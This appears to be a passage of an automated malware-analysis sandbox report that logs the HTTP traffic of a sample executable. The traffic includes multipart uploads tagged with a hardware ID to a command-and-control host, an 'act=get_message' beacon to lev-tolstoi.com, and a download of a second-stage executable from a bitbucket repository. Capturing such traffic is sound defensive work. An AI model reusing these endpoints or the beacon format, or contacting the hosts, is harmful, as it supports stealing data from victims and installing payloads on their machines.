                                                                                                                                                                                                                                                                        2024-12-23 07:40:55 UTC15331OUTData Raw: 2d 2d 32 4c 5a 35 55 41 54 46 49 41 49 58 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 36 37 30 45 34 33 46 45 44 39 33 35 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 4c 5a 35 55 41 54 46 49 41 49 58 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 4c 5a 35 55 41 54 46 49 41 49 58 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 32 4c
                                                                                                                                                                                                                                                                        Data Ascii: --2LZ5UATFIAIX09Content-Disposition: form-data; name="hwid"62670E43FED93598AC8923850305D13E--2LZ5UATFIAIX09Content-Disposition: form-data; name="pid"1--2LZ5UATFIAIX09Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--2L
                                                                                                                                                                                                                                                                        2024-12-23 07:40:55 UTC15331OUTData Raw: cf 31 16 ac 65 6a 4f bf b9 8c 93 0c 3e ac 9d de 92 5e b4 99 f9 45 1d b5 2e ee 42 f7 42 df b3 ea 45 51 52 b7 b2 7a 7f 08 b4 5e e1 2f df f3 da 90 19 89 f5 1e 24 04 e8 2c 19 74 fb b6 14 ae 86 72 c8 a8 a8 c1 14 58 0f c9 4f a6 ec bb cd 26 a1 99 0b f4 73 5c 2b 82 a0 b3 04 c7 60 66 d9 d2 94 a3 37 ef 69 15 a0 28 4d 91 61 c9 8a a9 bb cd 41 1d 7c cd 6d 84 c5 0f 09 ca e8 58 d4 6e 31 6f d2 25 ba 00 a5 47 56 c7 55 57 61 34 ea 2b 2e 46 8f 8c a5 71 71 fc 86 2f 4b f1 71 06 74 dd 86 ba 17 91 5f db 60 04 65 2e 8e 57 ff 83 e4 d8 bb 07 07 c7 79 28 48 19 11 0f 60 ae 89 90 ce 9d 79 b8 d9 be 1f 84 73 2b 25 ef 95 31 c3 c1 ea a9 8d 2f 37 e1 04 2c 3c a8 b2 96 21 a6 67 95 25 88 ea bc 9c ad 02 c2 b8 95 52 07 8c cc 9b ef 13 42 b5 e0 62 46 ca 2a 20 52 79 7f 49 1f 87 ea fd ee fe dc e4
                                                                                                                                                                                                                                                                        Data Ascii: 1ejO>^E.BBEQRz^/$,trXO&s\+`f7i(MaA|mXn1o%GVUWa4+.Fqq/Kqt_`e.Wy(H`ys+%1/7,<!g%RBbF* RyI
                                                                                                                                                                                                                                                                        2024-12-23 07:40:55 UTC15331OUTData Raw: ce ac d3 ae e7 dd fe 46 6f 24 b9 00 7e b1 f6 1a b1 02 66 1f e7 1d 53 69 20 d0 42 a0 81 83 9a f7 0d ba 23 4b 92 ab b7 93 ce 68 65 71 bf af 8b da 95 7e a2 8e 56 96 71 8f a2 35 9b ee 79 13 c1 87 a9 b0 d7 32 85 ea ee 79 07 3e 6a 6e ef 3f 2b 53 b2 50 bf 8e 2b 37 ca e8 4d 6d c3 be da 67 2a 15 52 8a 64 5f 4c 62 fc 41 19 2f 76 21 23 ac 08 d8 df 3a 95 c4 a7 d3 44 13 83 26 34 ea 49 1f 4f 37 90 63 d7 7a 1e 83 d5 20 4c ac b8 ec 04 0f 05 cf 70 db b4 2b 52 e9 c3 99 65 c4 82 d5 94 00 e2 2c 62 de 27 67 36 c6 ab c9 95 ec e2 a3 49 05 1d aa db 33 17 28 83 8d a7 b9 f5 8a c5 ca 9b 15 d4 33 df cd 85 b5 e9 a4 ee 45 b2 fe d1 d7 c1 06 2b 93 b2 19 f1 b7 76 ca 4e dd 0f 9c d8 44 b7 66 06 b4 b7 2d 5c 75 4c d7 c4 78 d7 a5 42 08 07 ec cd 78 46 fb 09 53 c5 77 bf f7 d8 b6 6d 22 49 c5 b3
                                                                                                                                                                                                                                                                        Data Ascii: Fo$~fSi B#Kheq~Vq5y2y>jn?+SP+7Mmg*Rd_LbA/v!#:D&4IO7cz Lp+Re,b'g6I3(3E+vNDf-\uLxBxFSwm"I
                                                                                                                                                                                                                                                                        2024-12-23 07:40:55 UTC15331OUTData Raw: 64 cc 99 eb c8 dc 43 35 d8 25 ed af 50 53 6a c2 a0 0d 49 18 8c b7 81 91 f7 36 ef 03 25 e6 6a fa 8b a9 a7 fa a0 ee 85 79 71 39 d8 95 13 4d 90 74 48 6b 99 75 ff 3c 7f 8e 07 9c 4a 15 e9 bf a5 14 74 b9 12 02 f2 a9 d0 8f fd 97 ab 6a 67 99 14 4b d6 56 4d 3e 53 29 06 11 22 5e 80 5b 9f 8a 0d 57 9e 1a 92 df 56 d7 b9 23 ce 8d aa d6 7c b4 c4 51 14 10 c7 95 7e 42 71 63 8e cd 02 f5 02 c8 a4 f3 7b b3 5a 7c 9b 35 20 a9 03 24 0f 20 7c 92 1d 1a 76 a5 b1 be bc 8c 79 43 6b b8 86 1b 8a da 50 17 f2 ac 51 d8 5c 9e 46 58 e5 f1 9c 3a 4f be cb 82 59 d6 5f a6 54 b8 d4 03 d4 09 2e 7a f3 e7 51 f6 7e f4 ff f6 05 f8 47 14 fe 6f d9 80 e6 82 1a 0f f4 d1 1f 74 4f a5 d1 ce 43 14 81 8d 2d db 81 8d 32 a7 cf ec df 62 94 86 e1 ca 0f cf 6a 24 58 ab 13 5f 5e 3f 13 c4 c2 91 16 c1 87 d1 b0 c4 ca
                                                                                                                                                                                                                                                                        Data Ascii: dC5%PSjI6%jyq9MtHku<JtjgKVM>S)"^[WV#|Q~Bqc{Z|5 $ |vyCkPQ\FX:OY_T.zQ~GotOC-2bj$X_^?
                                                                                                                                                                                                                                                                        2024-12-23 07:40:55 UTC15331OUTData Raw: 61 70 1b db d4 26 56 19 22 76 89 63 2e b8 64 ea 70 8d b6 d0 ca 2a ba 3d f9 d6 89 75 fa 0d f0 56 c8 79 c6 7a 84 86 09 c1 f8 4e cd 75 7c 78 9c ba 07 ef e9 da 1f c1 c7 b7 aa 67 17 3d 49 d8 de 7c 46 32 eb ce 3b 4a 84 51 9d 91 51 ed e3 c6 b7 df cb 38 25 90 8d a2 a3 c3 48 61 29 56 54 70 ff f9 13 94 3c 41 b2 dd 9a 61 57 66 0b 82 b9 e1 ea 19 25 17 3f a4 33 64 c9 6d a3 11 a0 8c 86 50 0f de b8 52 80 de b6 7f ee 0d 48 61 78 b2 0c d3 d0 78 66 ae 55 0a 25 59 93 4b f4 c5 ec 9f 8a f7 35 e8 60 3f a2 d1 ae 1a d4 99 a7 98 9a 12 2f 86 88 0d 29 8c b3 5e 4d 10 4a 7e d4 4a d7 fc b6 0d f1 d3 1f ad e3 2f 5f 36 4a ac ca 5e 42 92 bc 30 63 fe 23 13 48 f0 c9 e3 26 e3 a5 e4 3b 2d bc f4 aa b8 f5 d0 66 cc b6 ea 29 81 12 af 4b dc b7 07 86 dd e4 02 30 7e 7c c0 a3 b9 53 22 8e b0 71 8d 17
                                                                                                                                                                                                                                                                        Data Ascii: ap&V"vc.dp*=uVyzNu|xg=I|F2;JQQ8%Ha)VTp<AaWf%?3dmPRHaxxfU%YK5`?/)^MJ~J/_6J^B0c#H&;-f)K0~|S"q
                                                                                                                                                                                                                                                                        2024-12-23 07:40:55 UTC15331OUTData Raw: 16 1c 86 4a 55 c1 e2 07 af cd 19 76 a5 7d 5f fc 27 2c fc 50 82 1f f4 0f e4 da 19 a2 18 f3 c1 f3 81 65 e5 c3 f5 8a ac 2a 0a 08 26 a5 29 32 15 a9 69 0f b6 9a 8f f3 0b e4 34 6b 1f 1a 16 4d a4 a9 ef 52 46 de e9 2c 65 eb 7e b8 1f 0c 7f e2 fe a4 4c 86 28 30 af 39 ac 57 99 b7 ab 32 6c 07 36 5b ea 6e fe 8d 66 dc a1 ea 04 00 9a 36 c9 93 84 55 fe 47 1e ec c7 e7 10 88 d0 56 2f d3 01 a9 48 99 af 95 2a 10 da 87 7a d8 1f 16 b0 60 b1 8e 84 d2 1c 4c 68 38 80 ed 75 41 be 15 49 e7 ce ed 82 bb 58 f8 f8 41 c6 75 02 6f 89 4c 13 bf fd 84 ac 44 ab 38 f6 8f 38 b8 dc 36 0e 25 37 6d 11 8f 87 2c 33 1c 2f 48 59 8b f1 de bf 7c d9 43 7f 26 2a 52 78 11 03 8a 8f 5b 67 30 b4 14 04 de be c8 13 40 69 a1 35 b9 5f 01 ed ba 3d f3 ad da 42 d7 7e 7c 40 93 f6 96 49 04 5c 89 b5 4e 0a ee 1c 36 47
                                                                                                                                                                                                                                                                        Data Ascii: JUv}_',Pe*&)2i4kMRF,e~L(09W2l6[nf6UGV/H*z`Lh8uAIXAuoLD886%7m,3/HY|C&*Rx[g0@i5_=B~|@I\N6G
                                                                                                                                                                                                                                                                        2024-12-23 07:40:55 UTC15331OUTData Raw: be fb 14 f9 04 0b c1 96 1f 0e 0d ad 2a 4c 89 2c 9c f1 4f 09 f8 ca 47 e7 8b a3 9e 48 1f 9e 61 6d c1 c1 de dc b7 5b f1 96 96 a9 fb f4 00 34 8c 47 fe 4f a2 63 72 9a 45 5f f0 24 d8 29 a5 fa b7 1e 58 35 d4 03 a6 82 8c ce df c8 f4 46 d5 b6 05 51 f4 36 f1 5b 1d 4a 59 09 16 ad 37 d0 f9 04 40 a2 09 2f c4 03 92 ab 37 e8 bc 22 15 fd 81 64 9b 3c 62 28 11 4a c2 7f 38 52 57 86 f9 51 aa 8e 05 f8 b4 71 9a c2 cb 9c 28 55 bf 84 f8 b4 d6 1a 0a c3 24 7a 2b 66 e1 66 61 5e 2c f8 b1 bd dc 75 7c b3 27 4b 43 e9 65 8d 51 ca 8f 12 da c7 a8 c3 31 45 98 88 04 f5 fb 6b 46 23 a1 b2 10 6d ef f6 21 ff cc 14 14 35 e7 a8 d1 6a da 3f 3e d0 15 41 72 eb 17 cf 73 5d 4a 95 f7 2f c1 70 58 b1 54 4d e4 cb 06 02 50 5b f9 81 d4 6f 5c ad 78 d6 56 c9 1f dd d5 35 f1 1c 55 34 f1 b6 42 be 70 9a 20 56 36
                                                                                                                                                                                                                                                                        Data Ascii: *L,OGHam[4GOcrE_$)X5FQ6[JY7@/7"d<b(J8RWQq(U$z+ffa^,u|'KCeQ1EkF#m!5j?>Ars]J/pXTMP[o\xV5U4Bp V6
                                                                                                                                                                                                                                                                        2024-12-23 07:40:55 UTC15331OUTData Raw: aa 5a ab 20 7d 23 7a 08 e0 5f 34 1a eb 47 d8 f3 fc b7 d6 95 0d a7 38 6c b9 39 0a a5 84 cd 89 a2 80 b0 a1 de 90 0a ce 90 22 83 33 96 3c 49 dc 31 a7 8f 66 11 02 68 1c b3 8c 56 c8 3d 2f d3 f7 73 58 26 ed ce 9e e1 94 99 b1 a5 4f 74 31 6a 0a 28 91 e2 f5 9a f6 f2 da 0e 84 95 1c 02 a9 b0 b0 3f 20 ab 7b 9f 3e 02 95 b3 ae c4 c1 46 34 d9 3c 1c 7e ff bd 71 7d 6b dd 0f 05 b5 ad 7c 19 b9 71 e1 54 b1 7c 81 88 ed d3 44 2d 66 04 8f bd bc de f3 9c e7 fa 50 2c fd 21 b5 e6 21 77 50 59 d8 28 45 d7 fb 3f 7f a7 a0 af 57 d7 33 2f 71 9d 62 32 b5 32 56 ff 19 56 73 c9 0c a8 67 c3 88 0d 77 09 94 63 8b 45 4c af 31 42 11 c7 be 80 5d b8 ee 05 47 c7 e8 68 17 8b 6a 0b 12 27 d3 29 dc 6a 9b c0 f9 0d 5b de 26 ac 43 fc f0 56 6d c1 5c 30 63 93 e2 3f 6d 35 ee 25 1b f1 ba 07 47 f4 1b 69 bb 3d
                                                                                                                                                                                                                                                                        Data Ascii: Z }#z_4G8l9"3<I1fhV=/sX&Ot1j(? {>F4<~q}k|qT|D-fP,!!wPY(E?W3/qb22VVsgwcEL1B]Ghj')j[&CVm\0c?m5%Gi=
                                                                                                                                                                                                                                                                        2024-12-23 07:40:55 UTC15331OUTData Raw: 4b 7c 42 8d a1 54 64 90 fe 26 b6 b6 cc 57 84 77 86 b7 25 2c b5 21 d7 67 d2 27 94 aa 35 76 a2 29 65 a2 b5 a1 c7 7f 1b 0d 45 bf 48 29 a2 96 fb 2a d2 fa 65 17 4e 06 02 47 4e c5 49 4d dd 09 15 f7 1a 64 d9 ff c4 13 5f ad bf 9a cf d8 09 7a 04 d9 33 02 60 ba fa 4b 58 4e e8 75 df 88 f6 28 11 65 01 7b 99 1b ad d3 f7 4a 43 82 f1 4a 51 31 91 3a 8f a9 29 6d a2 2e 4b 05 a8 a8 4f c6 e4 2a 54 a4 32 ac d1 29 b2 70 a2 fc 45 cf 46 3f 02 f1 7f 0f cd 10 03 7b b0 7c ca 98 14 07 6f b7 a8 0d 12 27 95 71 cf 9b 6f 2f 00 91 5b b0 fc 8d 8a a9 4b fe 20 f7 bf 53 0e 88 47 c2 e5 e0 f6 e2 00 b6 c4 cf 6c eb cc 12 81 f7 ce d4 4b f8 2e 28 1e bd 90 a0 65 da 75 98 53 c8 44 3f e8 a5 62 b6 f8 ea 8b 43 be 38 50 2a 0c 1e 19 82 70 c1 78 17 ab dc 3d 07 dd cb 79 1a 60 dc e8 6f 82 2d a8 fb 21 56 0e
                                                                                                                                                                                                                                                                        Data Ascii: K|BTd&Ww%,!g'5v)eEH)*eNGNIMd_z3`KXNu(e{JCJQ1:)m.KO*T2)pEF?{|o'qo/[K SGlK.(euSD?bC8P*px=y`o-!V
                                                                                                                                                                                                                                                                        2024-12-23 07:40:55 UTC15331OUTData Raw: e5 ec 07 64 da ad 58 4a 3c 8c c0 4c b6 8c 2b 63 29 7f fc 52 6f 4a 33 cb b0 5c dd 54 02 83 dd b5 79 e1 4a e3 fe dd 96 99 ce 13 c9 0f ab 1c d8 55 f5 28 c2 54 72 58 50 63 a4 fa 98 f8 02 fd c3 29 51 71 85 f9 8a 36 a1 79 d9 20 0a 39 df a3 cd 2c b8 a9 58 a5 52 8c f9 3d 3d b9 ac ed 50 bc d7 5a 55 13 2e b4 80 ac 25 35 5c 2c c2 98 5e fa 0a e1 5d 62 42 50 5f 2c ec 6f 8d 3c f5 36 e8 62 55 77 cf e7 fd 09 4c 96 69 cd cb ac ea 17 ea 2e 4b 0e af 14 3b a7 88 cd 33 58 f8 ec b5 78 40 d1 ef 5d 9b f0 dc 44 52 66 60 37 65 e8 4f ec 8c 1c 25 fb ec 78 44 a1 fc 0b fa 87 24 b5 58 6f da b1 bd ad 92 0f f6 7e 28 97 f2 c3 71 de 56 0c 8b 67 be 99 fd 05 1e 45 53 f6 2a 44 fe 9b 22 d2 50 26 e0 98 1f 36 5d e2 a8 f7 42 e4 b3 c1 87 3b a9 a2 16 51 66 0c 0b 93 b8 ec 63 31 82 82 a1 27 1d af 3c
                                                                                                                                                                                                                                                                        Data Ascii: dXJ<L+c)RoJ3\TyJU(TrXPc)Qq6y 9,XR==PZU.%5\,^]bBP_,o<6bUwLi.K;3Xx@]DRf`7eO%xD$Xo~(qVgES*D"P&6]B;Qfc1'<
                                                                                                                                                                                                                                                                        2024-12-23 07:40:59 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:40:59 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=ib2eosupr4aiq8thi2m2gup2rj; expires=Fri, 18 Apr 2025 01:27:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2J%2F4%2BQgXEEpzqTzwDTtvtv2zJtgupMaTU7d6GyLnnbamZMdlPfHIlChA4%2BAGLDQt92C7q9OuHMnWOs9rjD7zfKQSf3Ide9NolYoBQz7FEivjPMhZNCi2Q3wxr82QQGTb3Hg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66b4d09dfd4333-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2076&min_rtt=2048&rtt_var=825&sent=334&recv=608&lost=0&retrans=0&sent_bytes=2836&recv_bytes=590695&delivery_rate=1282389&cwnd=248&unsent_bytes=0&cid=2b34990056cac56a&ts=3993&x=0"


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        8192.168.2.1149767104.21.66.864437428C:\Users\user\Desktop\jSFUzuYPG9.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 07:41:00 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 88
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 07:41:00 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 36 32 36 37 30 45 34 33 46 45 44 39 33 35 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=62670E43FED93598AC8923850305D13E
                                                                                                                                                                                                                                                                        2024-12-23 07:41:01 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:41:01 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=bcepefe05ands14rdbl50l40u8; expires=Fri, 18 Apr 2025 01:27:40 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EN5A8Qf80p9gEGeAi%2BP2gwlKkya6MIVdxPTO9cnL8Ir3l83H6fRcjtlh9VCzhS17E8s5efG5w%2FtFUZ6r1SVCNz%2BGa5goST6gVeuTX0YYJkphWdTst4CqTqLmEZUFZA2Tv8g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66b4f20cc94235-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1570&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1812538&cwnd=248&unsent_bytes=0&cid=a556981212f5d543&ts=758&x=0"
                                                                                                                                                                                                                                                                        2024-12-23 07:41:01 UTC198INData Raw: 63 30 0d 0a 51 6d 56 57 4c 58 75 32 54 6f 72 4a 77 6b 6c 64 74 74 71 59 69 4b 76 71 2f 52 7a 75 77 62 43 47 5a 39 2f 49 65 51 38 6d 4f 36 30 5a 48 6e 52 59 57 59 78 73 34 72 32 32 4f 53 36 4d 68 72 66 55 68 49 69 55 61 49 79 30 30 2b 30 43 71 2b 59 57 66 55 46 6e 67 69 38 63 4f 45 67 4d 77 53 48 34 6f 72 45 35 50 4e 57 2f 71 62 71 59 32 63 77 75 73 75 37 44 35 51 6d 37 6c 46 5a 72 53 55 7a 44 4c 67 6f 33 53 51 6a 71 59 63 79 6d 73 43 51 38 77 71 37 78 35 73 79 70 6c 58 32 63 71 4d 54 6e 42 62 4f 74 56 32 70 65 58 6f 39 75 52 7a 42 5a 57 59 78 2b 70 75 75 6e 61 32 65 48 70 38 55 3d 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c0QmVWLXu2TorJwkldttqYiKvq/RzuwbCGZ9/IeQ8mO60ZHnRYWYxs4r22OS6MhrfUhIiUaIy00+0Cq+YWfUFngi8cOEgMwSH4orE5PNW/qbqY2cwusu7D5Qm7lFZrSUzDLgo3SQjqYcymsCQ8wq7x5syplX2cqMTnBbOtV2peXo9uRzBZWYx+puuna2eHp8U=
                                                                                                                                                                                                                                                                        2024-12-23 07:41:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        9192.168.2.1149772185.166.143.494437428C:\Users\user\Desktop\jSFUzuYPG9.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 07:41:03 UTC248OUTGET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Host: bitbucket.org
                                                                                                                                                                                                                                                                        2024-12-23 07:41:03 UTC5956INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:41:03 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Server: AtlassianEdge
                                                                                                                                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIZ7XL2U7&Signature=FCPVgbdRXx%2FDjhvQvPzU1dQ3dNE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQDOJENS5X8jDlzsJxuPb2pH5MjLxA952GUpuJ9K8c8eAgIgeBp5O3n2dCArHo7VZBQEhKa5Ybqf7xD1F%2BZzGAepczwqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDIf5Q5o38rOF7VorZiqEApSlSAviV7fqKWYqWG4d0%2BlfrC%2FFb7F%2Fc2GVH68DYRo2vd%2BAREXXJpsY5s%2BmBpFXzm6fy26oRa5GS8wZd9Nc0FYJUoSZjhvzo%2FM%2FM6PUw%2FINg1gRCi7PRFdMEoNyTOkNSC2S8%2FTK1pGG4o8hZEeM8vyBsvr0QE%2FuOcUu5JrCscWEP%2BFIPyeSmLpATVuvDiwsooP38cS3cC5Mhjir0zJP2xZUtK%2BDRPz%2BgACYHXpemn2WCxpgImxr6YWsOyoQOhLS0ii2eBVVjZpJNT1ozD%2FkBPjRAjUAEFa5C8b6hC%2FuETQ%2BEKayEkNgfTaLoNER0YYk%2BLdQYmqD3E5OEWQc3mClPsl8QceiMMSmpLsGOp0BepAG7qOdA1hoVp77QSvDNIy85cM9X4QKinihkh90Gdln%2FwS%2BMi4ynXs5fFObnXard%2 [TRUNCATED]
                                                                                                                                                                                                                                                                        Expires: Mon, 23 Dec 2024 07:41:03 GMT
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                                                        X-Used-Mesh: False
                                                                                                                                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                                                        X-Dc-Location: Micros-3
                                                                                                                                                                                                                                                                        X-Served-By: 68ce1657753d
                                                                                                                                                                                                                                                                        X-Version: c9b3998323c0
                                                                                                                                                                                                                                                                        X-Static-Version: c9b3998323c0
                                                                                                                                                                                                                                                                        X-Request-Count: 1664
                                                                                                                                                                                                                                                                        X-Render-Time: 0.04715466499328613
                                                                                                                                                                                                                                                                        X-B3-Traceid: dbc8b4061a6147f6ae7d3d383d5e711d
                                                                                                                                                                                                                                                                        X-B3-Spanid: 5f1478fe78f17de0
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-e [TRUNCATED]
                                                                                                                                                                                                                                                                        X-Usage-Quota-Remaining: 999014.018
                                                                                                                                                                                                                                                                        X-Usage-Request-Cost: 999.53
                                                                                                                                                                                                                                                                        X-Usage-User-Time: 0.029618
                                                                                                                                                                                                                                                                        X-Usage-System-Time: 0.000368
                                                                                                                                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Atl-Traceid: dbc8b4061a6147f6ae7d3d383d5e711d
                                                                                                                                                                                                                                                                        Atl-Request-Id: dbc8b406-1a61-47f6-ae7d-3d383d5e711d
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                                                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                                                                                                                                        Server-Timing: atl-edge;dur=156,atl-edge-internal;dur=3,atl-edge-upstream;dur=154,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        10192.168.2.114977752.216.152.1244437428C:\Users\user\Desktop\jSFUzuYPG9.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
